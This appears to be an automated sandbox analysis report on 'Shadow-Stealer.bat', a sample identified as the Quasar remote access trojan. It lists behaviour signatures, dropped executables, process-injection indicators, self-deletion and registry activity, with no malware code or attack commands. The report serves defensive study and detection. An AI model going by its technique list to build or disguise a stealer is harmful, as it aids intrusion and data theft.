Analysis Overview
SHA256: 84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Threat Level: Known bad
The file Shadow-Stealer.bat was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar payload
Quasar RAT
Executes dropped EXE
Deletes itself
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Runs ping.exe
Uses Task Scheduler COM API
Views/modifies file attributes
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of UnmapMainImage
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported: 2024-05-28 09:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted: 2024-05-28 09:01
Reported: 2024-05-28 09:33
Platform: win11-20240508-en
Max time kernel: 1800s
Max time network: 1799s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 2088 created 2892 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 2464 created 5480 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3064 created 5732 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 5360 created 5532 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 5328 created 6064 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Deletes itself
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | C:\Windows\system32\DllHost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887099" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:05:00 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={57EC1572-54E1-45A8-8FEE-66D1A3BEFC90}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000e0c9f43258a1da018955b7015ca1da018955b7015ca1da0114000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
